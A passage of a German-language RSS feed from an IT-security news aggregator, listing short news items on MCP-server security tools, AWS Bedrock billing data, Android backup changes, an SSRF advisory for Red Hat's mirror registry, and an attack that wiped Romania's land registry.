<li><strong>Invariant Labs</strong> bietet mit <a href="https://github.com/invariantlabs-ai/mcp-scan" target="_blank" rel="noreferrer noopener">MCP-Scan</a> ein quelloffenes Tool, das die statische Analyse und Echtzeitüberwachung von MCP-Servern ermöglicht. Mit <a href="https://invariantlabs.ai/blog/guardrails" target="_blank" rel="noreferrer noopener">Guardrails</a> hat das Startup auch ein kommerzielles Produkt im Angebot. Dabei handelt es sich um einen Proxy. Der zwischen KI-Agenten und MCP-Servern sitzt und vor Security-Risiken schützen soll. Das Tool befähigt Anwender außerdem dazu, Richtlinien aufzusetzen.</li>



<li><strong>Highflame </strong>(vormals Javelin) <a href="https://www.highflame.com/" target="_blank" rel="noreferrer noopener">addressiert</a> ebenfalls das Thema MCP-Sicherheit. Etwa mit Funktionen wie MCP-Server auf Risiken zu scannen oder Datenanfragen zu überprüfen.  </li>



<li><strong>Lasso Security</strong> stellt ein Open-Source-<a href="https://github.com/lasso-security/mcp-gateway" target="_blank" rel="noreferrer noopener">MCP-Gateway</a> zur Verfügung, das die Konfiguration und das Lebenszyklusmanagement von MCP-Servern ermöglicht und Messages um sensible Informationen bereinigt.</li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.csoonline.com/article/4087656/what-cisos-need-to-know-about-new-tools-for-securing-mcp-servers.html" target="_blank">im Original</a> bei unser Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacker-Pschorr baut Partnerschaft bei 1860 aus - OneFootball]]></title>
<description><![CDATA[Was aber seit heute fix ist: Hacker-Pschorr, aus dem Imperium Schörghuber, steht den Sechzgern weiter treu zur Seite. Video OneFootball ...]]></description>
<link>https://tsecurity.de/de/3685056/hacking/hacker-pschorr-baut-partnerschaft-bei-1860-aus-onefootball/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685056/hacking/hacker-pschorr-baut-partnerschaft-bei-1860-aus-onefootball/</guid>
<pubDate>Wed, 22 Jul 2026 02:23:44 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Was aber seit heute fix ist: <b>Hacker</b>-Pschorr, aus dem Imperium Schörghuber, steht den Sechzgern weiter treu zur Seite. Video OneFootball ...]]></content:encoded>
</item>
<item>
<title><![CDATA[The defense against the AI arts.]]></title>
<description><![CDATA[Trump's latest AI leader resigns. The Army burns through its AI tokens. Scammers impersonate IC3 personnel.HollowGraph malware uses a compromised Microsoft 365 calendar for C2. Qilin ransomware targets a critical Palo Alto Networks flaw. A North Korean campaign targets Web3 and cryptocurrency pro...]]></description>
<link>https://tsecurity.de/de/3684909/it-security-nachrichten/the-defense-against-the-ai-arts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684909/it-security-nachrichten/the-defense-against-the-ai-arts/</guid>
<pubDate>Tue, 21 Jul 2026 23:54:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Trump's latest AI leader resigns. The Army burns through its AI tokens. Scammers impersonate IC3 personnel.HollowGraph malware uses a compromised Microsoft 365 calendar for C2. Qilin ransomware targets a critical Palo Alto Networks flaw. A North Korean campaign targets Web3 and cryptocurrency professionals through fake job recruitment scams. Zimbra patches multiple critical bugs. Shadow AI creates regulatory headaches. Hackers wipe Romania’s land registry database. Our guest is Errol Weiss, Chief Security Officer at Health-ISAC, setting the record straight on ransomware trends. Patching the automotive security system you didn’t know you had.]]></content:encoded>
</item>
<item>
<title><![CDATA[iPhone mit zwei Akkus aufgetaucht: Überdeutlicher Hinweis auf Apples Zukunft]]></title>
<description><![CDATA[Im Code von iOS 27 gibt es einen überdeutlichen Hinweis auf Apples revolutionär neues iPhone-Modell. Es hat zwei Akkus, auf jeder Seite einen!
																					Dieser Artikel wurde einsortiert unter 
																	Apple iPhone,																	Smartphone,																	Technology,							...]]></description>
<link>https://tsecurity.de/de/3684344/it-nachrichten/iphone-mit-zwei-akkus-aufgetaucht-ueberdeutlicher-hinweis-auf-apples-zukunft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684344/it-nachrichten/iphone-mit-zwei-akkus-aufgetaucht-ueberdeutlicher-hinweis-auf-apples-zukunft/</guid>
<pubDate>Tue, 21 Jul 2026 18:18:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Im Code von iOS 27 gibt es einen überdeutlichen Hinweis auf Apples revolutionär neues iPhone-Modell. Es hat zwei Akkus, auf jeder Seite einen!
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/mobile/iphone.html">Apple iPhone</a>,																	<a href="https://www.netzwelt.de/smartphone/index.html">Smartphone</a>,																	<a href="https://www.netzwelt.de/technology/index.html">Technology</a>,																	<a href="https://www.netzwelt.de/handy/index.html">Handy</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Trump administration's AI czar resigns.]]></title>
<description><![CDATA[Extortion group wipes Romania's land registry database. FBI warns of impersonators targeting scam victims.]]></description>
<link>https://tsecurity.de/de/3684312/it-security-nachrichten/the-trump-administrations-ai-czar-resigns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684312/it-security-nachrichten/the-trump-administrations-ai-czar-resigns/</guid>
<pubDate>Tue, 21 Jul 2026 18:11:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Extortion group wipes Romania's land registry database. FBI warns of impersonators targeting scam victims.]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS standardizes more AI billing data to simplify cost analysis]]></title>
<description><![CDATA[AWS has updated AWS Data Exports, its service for generating and managing cost and usage Reports (CURs), to include standardized Amazon Bedrock product metadata, making it easier for enterprise engineering teams to analyze AI usage and spending as they scale AI deployments spanning multiple found...]]></description>
<link>https://tsecurity.de/de/3683996/it-nachrichten/aws-standardizes-more-ai-billing-data-to-simplify-cost-analysis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683996/it-nachrichten/aws-standardizes-more-ai-billing-data-to-simplify-cost-analysis/</guid>
<pubDate>Tue, 21 Jul 2026 16:18:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AWS has updated AWS Data Exports, its service for generating and managing cost and usage Reports (CURs), to include standardized Amazon Bedrock product metadata, making it easier for enterprise engineering teams to analyze AI usage and spending as they scale AI deployments spanning multiple foundation models.</p>



<p class="wp-block-paragraph">The update extends billing exports with normalized fields for model provider, model name, inference type, inference mode, billing unit and <a href="https://www.infoworld.com/article/2336139/amazon-bedrock-a-solid-generative-ai-foundation.html">Bedrock</a> product family, and will enable enterprises to identify which models generated costs and compare spending across providers without relying on custom parsing or normalization of billing records, AWS wrote in a <a href="https://aws.amazon.com/about-aws/whats-new/2026/07/aws-data-exports-amazon-bedrock-product-metadata/" target="_blank" rel="noreferrer noopener">blog post</a>.</p>



<p class="wp-block-paragraph">That reduced reliance on custom parsing will reduce the engineering effort required to analyze billing data, analysts said.</p>



<p class="wp-block-paragraph">“Before the update, a data engineer would typically need to maintain a model ID registry, write regex against usage type strings, or join AWS CloudTrail with CUR to figure out which provider generated which cost,” said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">The new standardized fields “can be the difference between a billing pipeline that needs constant babysitting and one that doesn’t,” Chopra added.</p>



<p class="wp-block-paragraph">That’s because custom parsing logic is more prone to break down or require maintenance when AWS adds new models or updates pricing in Bedrock, said <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting.</p>



<h2 class="wp-block-heading">Richer billing data to boost enterprise AI cost governance</h2>



<p class="wp-block-paragraph">Beyond reducing engineering overhead, the update could also help enterprises improve AI cost governance.</p>



<p class="wp-block-paragraph">Before this update FinOps teams struggled to identify which model Bedrock related to because usage type fields were inconsistent, and there was no unified product family name that captured all Bedrock costs in one place, Chopra said.</p>



<p class="wp-block-paragraph">“Now those attributes — model provider, model name, inference type, inference mode, pricing unit — are standardized and available by default. That’s the plumbing work no one talks about, but it’s what makes downstream reporting actually reliable,” Chopra added.</p>



<p class="wp-block-paragraph">This, said Jain, makes it easier to build dashboards showing cost by model, provider, token type or inference mode while also identifying expensive workloads, unusual token growth and opportunities to move to cheaper models or batch processing.</p>



<p class="wp-block-paragraph">It’s a timely update, especially in light of last week’s <a href="https://health.aws.amazon.com/health/status?eventID=arn:aws:health:global::event/BILLING/AWS_BILLING_OPERATIONAL_ISSUE/AWS_BILLING_OPERATIONAL_ISSUE_47B68_BACBD91434F" target="_blank" rel="noreferrer noopener">AWS billing issue</a> that caused some customers to see incorrect cost estimates of services consumed in the AWS Management Console, said <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at FinOps services providing firm ZopDev.</p>



<p class="wp-block-paragraph">“Anything that gives customers clearer, more granular and more trustworthy billing data is welcome when confidence in the numbers has just been shaken. It does not fix what went wrong, but better visibility into where spend is going is exactly what teams want more of after an episode like that,” Bandta added.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4199470/aws-standardizes-more-ai-billing-data-to-simplify-cost-analysis.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS standardizes more AI billing data to simplify cost analysis]]></title>
<description><![CDATA[AWS has updated AWS Data Exports, its service for generating and managing cost and usage Reports (CURs), to include standardized Amazon Bedrock product metadata, making it easier for enterprise engineering teams to analyze AI usage and spending as they scale AI deployments spanning multiple found...]]></description>
<link>https://tsecurity.de/de/3683957/ai-nachrichten/aws-standardizes-more-ai-billing-data-to-simplify-cost-analysis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683957/ai-nachrichten/aws-standardizes-more-ai-billing-data-to-simplify-cost-analysis/</guid>
<pubDate>Tue, 21 Jul 2026 16:05:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AWS has updated AWS Data Exports, its service for generating and managing cost and usage Reports (CURs), to include standardized Amazon Bedrock product metadata, making it easier for enterprise engineering teams to analyze AI usage and spending as they scale AI deployments spanning multiple foundation models.</p>



<p class="wp-block-paragraph">The update extends billing exports with normalized fields for model provider, model name, inference type, inference mode, billing unit and <a href="https://www.infoworld.com/article/2336139/amazon-bedrock-a-solid-generative-ai-foundation.html">Bedrock</a> product family, and will enable enterprises to identify which models generated costs and compare spending across providers without relying on custom parsing or normalization of billing records, AWS wrote in a <a href="https://aws.amazon.com/about-aws/whats-new/2026/07/aws-data-exports-amazon-bedrock-product-metadata/" target="_blank" rel="noreferrer noopener">blog post</a>.</p>



<p class="wp-block-paragraph">That reduced reliance on custom parsing will reduce the engineering effort required to analyze billing data, analysts said.</p>



<p class="wp-block-paragraph">“Before the update, a data engineer would typically need to maintain a model ID registry, write regex against usage type strings, or join AWS CloudTrail with CUR to figure out which provider generated which cost,” said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">The new standardized fields “can be the difference between a billing pipeline that needs constant babysitting and one that doesn’t,” Chopra added.</p>



<p class="wp-block-paragraph">That’s because custom parsing logic is more prone to break down or require maintenance when AWS adds new models or updates pricing in Bedrock, said <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting.</p>



<h2 class="wp-block-heading">Richer billing data to boost enterprise AI cost governance</h2>



<p class="wp-block-paragraph">Beyond reducing engineering overhead, the update could also help enterprises improve AI cost governance.</p>



<p class="wp-block-paragraph">Before this update FinOps teams struggled to identify which model Bedrock related to because usage type fields were inconsistent, and there was no unified product family name that captured all Bedrock costs in one place, Chopra said.</p>



<p class="wp-block-paragraph">“Now those attributes — model provider, model name, inference type, inference mode, pricing unit — are standardized and available by default. That’s the plumbing work no one talks about, but it’s what makes downstream reporting actually reliable,” Chopra added.</p>



<p class="wp-block-paragraph">This, said Jain, makes it easier to build dashboards showing cost by model, provider, token type or inference mode while also identifying expensive workloads, unusual token growth and opportunities to move to cheaper models or batch processing.</p>



<p class="wp-block-paragraph">It’s a timely update, especially in light of last week’s <a href="https://health.aws.amazon.com/health/status?eventID=arn:aws:health:global::event/BILLING/AWS_BILLING_OPERATIONAL_ISSUE/AWS_BILLING_OPERATIONAL_ISSUE_47B68_BACBD91434F" target="_blank" rel="noreferrer noopener">AWS billing issue</a> that caused some customers to see incorrect cost estimates of services consumed in the AWS Management Console, said <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at FinOps services providing firm ZopDev.</p>



<p class="wp-block-paragraph">“Anything that gives customers clearer, more granular and more trustworthy billing data is welcome when confidence in the numbers has just been shaken. It does not fix what went wrong, but better visibility into where spend is going is exactly what teams want more of after an episode like that,” Bandta added.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die 10 häufigsten WordPress-Fehler und die passenden Lösungen]]></title>
<description><![CDATA[WordPress-Fehler machen Website-Betreibern und -Besuchern immer mal wieder zu schaffen. Viele kennen wahrscheinlich die Situation, dass man eine Website aufrufen will und WordPress lediglich eine weiße Seite anzeigt. Zum Glück gibt es für jeden typischen WordPress-Error eine passende Lösung. Man ...]]></description>
<link>https://tsecurity.de/de/3683153/server/die-10-haeufigsten-wordpress-fehler-und-die-passenden-loesungen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683153/server/die-10-haeufigsten-wordpress-fehler-und-die-passenden-loesungen/</guid>
<pubDate>Tue, 21 Jul 2026 11:15:39 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/wordpress-errors-t.jpg" width="1200" height="630" alt=""><br>WordPress-Fehler machen Website-Betreibern und -Besuchern immer mal wieder zu schaffen. Viele kennen wahrscheinlich die Situation, dass man eine Website aufrufen will und WordPress lediglich eine weiße Seite anzeigt. Zum Glück gibt es für jeden typischen WordPress-Error eine passende Lösung. Man muss keinesfalls Profi sein, um die häufigsten WordPress-Fehler zu beheben. Der Ratgeber von IONOS hilft Ihnen, Ihre WordPress-Website bei Problemen schnell wieder funktionstüchtig zu machen.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15927 | Red Hat mirror registry for OpenShift/Quay Mirror configuration endpoints/api/mirror.py validate_external_registry_url external_reference server-side request forgery (EUVD-2026-46150)]]></title>
<description><![CDATA[A vulnerability was found in Red Hat mirror registry for OpenShift and Quay. It has been rated as problematic. This impacts the function validate_external_registry_url of the file endpoints/api/mirror.py of the component Mirror configuration. The manipulation of the argument external_reference le...]]></description>
<link>https://tsecurity.de/de/3683145/sicherheitsluecken/cve-2026-15927-red-hat-mirror-registry-for-openshiftquay-mirror-configuration-endpointsapimirrorpy-validateexternalregistryurl-externalreference-server-side-request-forgery-euvd-2026-46150/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683145/sicherheitsluecken/cve-2026-15927-red-hat-mirror-registry-for-openshiftquay-mirror-configuration-endpointsapimirrorpy-validateexternalregistryurl-externalreference-server-side-request-forgery-euvd-2026-46150/</guid>
<pubDate>Tue, 21 Jul 2026 11:12:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/red_hat:mirror_registry_for_openshift">Red Hat mirror registry for OpenShift and Quay</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts the function <code>validate_external_registry_url</code> of the file <em>endpoints/api/mirror.py</em> of the component <em>Mirror configuration</em>. The manipulation of the argument <em>external_reference</em> leads to server-side request forgery.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-15927">CVE-2026-15927</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Diese neuen Funktionen bekommen Android-Nutzer im Juli]]></title>
<description><![CDATA[Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr Smartphone haben (unabhängig vom Hersteller).



Die Seite 9to5Google hat die wichtigsten Neuerungen zusammengefasst. Demnach bek...]]></description>
<link>https://tsecurity.de/de/3683027/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683027/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</guid>
<pubDate>Tue, 21 Jul 2026 10:33:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">Smartphone </a>haben (unabhängig vom Hersteller).</p>



<p>Die Seite <a href="https://9to5google.com/2026/07/09/android-documents-backup/" target="_blank" rel="noreferrer noopener">9to5Google</a> hat die wichtigsten Neuerungen zusammengefasst. Demnach bekommen Android-Nutzer die Option, die Sicherung von SMS-, MMS- und RCS-Nachrichten direkt zu steuern. Das ähnelt der <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">separaten Backup-Einstellung für ausgewählte Apps</a>, die wir Ihnen letzte Woche vorgestellt hatten.</p>



<p>Über <strong>Einstellungen &gt; Konten und Sicherung &gt; Google-Sicherung &gt; Weitere Gerätedaten</strong> gibt es nach Erhalt des Updates einen neuen Ein-/Aus-Schalter für SMS- und MMS-Nachrichten, Anrufverlauf und Geräteeinstellungen. Sie haben also deutlich mehr Kontrolle darüber, welche Daten Sie über die Google-Cloud speichern wollen.</p>



<p>Das ist auch besonders wichtig, da Google seit Neuestem <a href="https://www.pcwelt.de/article/3185747/google-erlaubt-android-nutzern-ab-sofort-kein-kostenloses-backup-mehr-speicherplatz-angererechnet.html" target="_blank" rel="noreferrer noopener">keine Gratis-Backups für Android-Geräte mehr erlaubt</a>. Jedes Backup Ihres Smartphones zählt also direkt auf Ihr verfügbares Speicherkontingent ein, das in der Gratis-Variante gerade einmal 15 GB sind.</p>



<p>Zusätzlich führt Android nun die lokale Sicherung von Dokumenten ein. Damit können Sie Ihre heruntergeladenen Dokumente automatisch in Google Drive speichern, damit diese sicher und von jedem Ihrer Geräte aus zugänglich sind. Auf der Seite „Sicherung“ erscheint dann neben „Fotos &amp; Videos“ und „Sonstige Gerätedaten“ ein neues Menü namens „Dokumente“.</p>



<p>Google erklärt, dass zu den unterstützten Dateiformaten .DOC, .PPT, .XLS, .PDF “und alle anderen auf diesem Gerät gespeicherten Dokumente” gehören. Dokumente sollen bei der Übertragung zwischen Ihrem Gerät und den Google-Diensten verschlüsselt werden. Änderungen, die an den Dokumenten an einem Ort vorgenommen werden, werden nicht mit anderen Orten synchronisiert.</p>



<h3 class="wp-block-heading">Mehr Neuerungen</h3>



<p>In den <a href="https://support.google.com/product-documentation/answer/14343500?hl=de" target="_blank" rel="noreferrer noopener">Versionshinweisen zu den Google-Systemdiensten</a> finden sich noch mehr kleine Neuerungen, die jetzt an Android-Nutzer ausgerollt werden. Dazu gehören unter anderem die Überarbeitung von In-App-Käufen mithilfe einer “verbesserten, nativen Storefront für Google One”, die Übertragung von Arbeitsprofilen auf Wear-OS-Smartwatches, eine neue Google-Standortfreigabe für Chromebooks sowie „neue Funktionen für Entwickler von Google- und Drittanbieter-Apps zur Unterstützung von Prozessen in ihren Apps im Zusammenhang mit Google Maps”.</p>



<p>All diese neuen Funktionen werden seit dem 6. Juli an Android-Nutzer verteilt. Über <strong>Einstellungen</strong> <strong>&gt;</strong> <strong>Sicherheit und Datenschutz</strong> <strong>&gt;</strong> <strong>Updates</strong> <strong>&gt;</strong> <strong>Google Play-Systemupdate</strong> können Sie die aktuell installierte Version der Google Play System Updates prüfen und gegebenenfalls auf eine neue Version aktualisieren.</p>



<p><a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-bekommen-das-update-komplette-geraeteliste.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google erlaubt Android-Nutzern kein Gratis-Backup mehr: Schonfrist von 45 Tagen]]></title>
<description><![CDATA[Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite Engadget berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.



Für neue...]]></description>
<link>https://tsecurity.de/de/3683022/it-nachrichten/google-erlaubt-android-nutzern-kein-gratis-backup-mehr-schonfrist-von-45-tagen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683022/it-nachrichten/google-erlaubt-android-nutzern-kein-gratis-backup-mehr-schonfrist-von-45-tagen/</guid>
<pubDate>Tue, 21 Jul 2026 10:33:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite <a href="https://www.engadget.com/2209189/google-will-now-count-all-android-backup-data-toward-your-storage-cap/">Engadget</a> berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.</p>



<p>Für neue Android-Nutzer gilt die Änderung seit dem<strong> 7. Juli 2026</strong>. Für bestehende Nutzer gilt eine Schonfrist von <strong>45 Tagen</strong>, bis sie in Kraft tritt. Google informiert Nutzer per Mail dazu:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Wir möchten dich über eine bevorstehende Aktualisierung unserer Speicherrichtlinien informieren. Außerdem führen wir neue Steuerelemente ein, mit denen du deine Android-Sicherungen besser verwalten kannst.</p>



<p><strong>Richtlinienänderung:</strong> In 45 Tagen werden alle Daten, die in den Sicherungen deines Android-Geräts enthalten sind, auf das Speicherplatzlimit deines Google-Kontos angerechnet. Fotos und Videos in Google Fotos und MMS-Daten werden bereits jetzt in deinen Google-Kontospeicherplatz einbezogen. Mit dieser Änderung werden auch alle anderen gesicherten Daten wie SMS, Anruflisten, Geräteeinstellungen und App-Einstellungen auf deinen Google-Kontospeicherplatz angerechnet. Nach Inkrafttreten dieser Richtlinie wird deine Gerätesicherung möglicherweise mehr Speicherplatz belegen. Wenn das Speicherplatzlimit deines Google-Kontos überschritten ist, werden automatische Sicherungen pausiert, bis du Speicherplatz freigibst oder dein Abo upgradest.</p>
</blockquote>



<p>Laut Google werden die Auswirkungen dieser Änderung recht begrenzt sein. Android-Sicherungskopien werden im Durchschnitt etwa <strong>40 Megabyte</strong> zusätzlichen Speicherplatz beanspruchen. Gleichzeitig werden weitere Einstellungen eingeführt, die den Nutzern mehr Kontrolle darüber geben, was gesichert wird.</p>



<p>Zuvor wurde etwa bekannt, <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">dass Android-Nutzer eine wichtige neue Backup-Funktion erhalten</a>, mit der sie selbst entscheiden können, welche App-Daten gesichert werden sollen und welche nicht. Demnächst möchte Google noch einführen, dass Nutzer ihre Geräteeinstellungen, den Anrufverlauf sowie SMS- und MMS-Nachrichten aus dem Sicherungsvorgang ausschließen können.</p>



<p>Es ist erwähnenswert, dass Google im Mai gleichzeitig den kostenlosen Speicherplatz für neue Konten <a href="https://www.pcwelt.de/article/3140205/googles-gratis-onlinespeicher-schrumpft-falls-sie-google-nicht-ihre-telefonnummer-verraten-test.html" target="_blank" rel="noreferrer noopener">von 15 Gigabyte auf 5 Gigabyte reduziert hat.</a> Es sei denn, der Nutzer verknüpft eine Telefonnummer mit dem Konto.</p>



<p>Je nachdem, wie viele Daten Sie bereits in der Google Cloud gesichert haben, könnte es also eng werden, selbst wenn die Sicherung nur wenige MB groß ist. Oder Sie merken von der Änderung nicht wirklich viel, da Sie ohnehin auf andere <a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Backup-Methoden</a> setzen.</p>



<p>Ein Upgrade auf 100 GB in <a href="https://one.google.com/about/plans?hl=de&amp;g1_landing_page=60" target="_blank" rel="noreferrer noopener">Google One</a> kostet 1,99 Euro monatlich, 2,99 Euro für 200 GB oder 9,99 Euro monatlich für 2 TB Speicherplatz. Mit enthalten ist auch der Zugriff auf “neue und leistungsstarke Funktionen” in Google Gemini.</p>



<p><a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Die besten Online-Backup-Dienste im Vergleich: Nie mehr Daten verlieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[NotCVE registry index — public records of vulnerabilities that shipped without a CVE]]></title>
<description><![CDATA[Posted by NotCVE Advisories on Jul 20----------------------------------------------------------------------------
NotCVE Registry Index — 2026-07-16
----------------------------------------------------------------------------

[-] About the NotCVE registry:

NotCVE (https://notcve.org) assigns pu...]]></description>
<link>https://tsecurity.de/de/3682792/it-security-nachrichten/notcve-registry-index-public-records-of-vulnerabilities-that-shipped-without-a-cve/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682792/it-security-nachrichten/notcve-registry-index-public-records-of-vulnerabilities-that-shipped-without-a-cve/</guid>
<pubDate>Tue, 21 Jul 2026 08:08:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Posted by NotCVE Advisories on Jul 20</p>----------------------------------------------------------------------------<br>
NotCVE Registry Index — 2026-07-16<br>
----------------------------------------------------------------------------<br>
<br>
[-] About the NotCVE registry:<br>
<br>
NotCVE (<a rel="nofollow" href="https://notcve.org/">https://notcve.org</a>) assigns public identifiers to real, verifiable<br>
vulnerabilities that did not receive a CVE — typically because the affected<br>
vendor did not acknowledge the issue. Each record preserves the technical...<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[ByteToBreach löscht rumänisches Grundbuch – Immobilienhandel steht still]]></title>
<description><![CDATA[BUKAREST / LONDON (IT BOLTWISE) – Ein Angriff der Gruppe ByteToBreach hat in Rumänien die gesamte Grundbuchdatenbank gelöscht und damit den Immobilienhandel weitgehend lahmgelegt. Notare können seit dem Vorfall keine neuen Transaktionen mehr veranlassen, weil Eigentumsnachweise und Details aus de...]]></description>
<link>https://tsecurity.de/de/3682470/it-security-nachrichten/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682470/it-security-nachrichten/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still/</guid>
<pubDate>Tue, 21 Jul 2026 03:06:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BUKAREST / LONDON (IT BOLTWISE) – Ein Angriff der Gruppe ByteToBreach hat in Rumänien die gesamte Grundbuchdatenbank gelöscht und damit den Immobilienhandel weitgehend lahmgelegt. Notare können seit dem Vorfall keine neuen Transaktionen mehr 